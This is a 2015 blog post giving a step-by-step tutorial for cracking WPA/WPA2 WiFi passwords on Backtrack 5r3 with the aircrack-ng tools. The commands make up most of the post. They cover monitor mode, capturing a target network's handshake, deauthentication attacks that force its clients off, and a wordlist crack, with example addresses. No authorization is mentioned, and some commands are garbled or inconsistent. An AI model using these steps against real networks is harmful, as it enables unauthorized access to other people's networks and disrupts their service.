Share it

       
   

Friday 3 July 2015

How To Hack WiFi Password On Backtrack 5r3 2015

No comments :

How To Hack WiFi Password On Backtrack 5r3 2015

How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

Learn How To Hack WPA WPA2 WiFi Password On 

BackTrack 5r3 -2015


Hello Guys Today i m Gonna Show You How To Hack WPA\WPA2 WiFi Password Cracking.


Requirements for WPA\WPA2 Cracking:


1= Backtrack 5r3

2= WiFi device

3= Word-list file
The commands which we will need in WPA\WPA2 Cracking are as under:


1= Airmon-ng

2= Airmon-ng start wlan0


3= Airodump-ng mon0


4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0


5= Aireplay-ng --deauth 1 -a (bssid) mon0


6= Aircrack-ng (file name) -w( drag worldlist file )


Process . . . .



1= Open terminal and type first command:


Airmon-ng :


This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

2= Now type second command :

Airmon-ng start wlan0 :


This command enables monitor mode on the wireless interface



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

3= Now type third command:

Airodump-ng mon0 :


This command will scane all networks. (AS shown)



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

4= Now type foruth command:

Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :


This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:


airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

5= Now type fifth command :

Aireplay-ng --deauth 64 -a (bssid) mon0 :


This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:


aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

6= Now type sixth command :

NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"


Aircrack-ng
 (file name) -wdrag world-list file ) :


This command will crack the password. (As Shown)



How To Hack WiFi Password On Backtrack 5r3 2015
How To Hack WiFi Password On Backtrack 5r3 2015

Hope all of you get it. If any problem ask me on Facebook 

No comments :

Post a Comment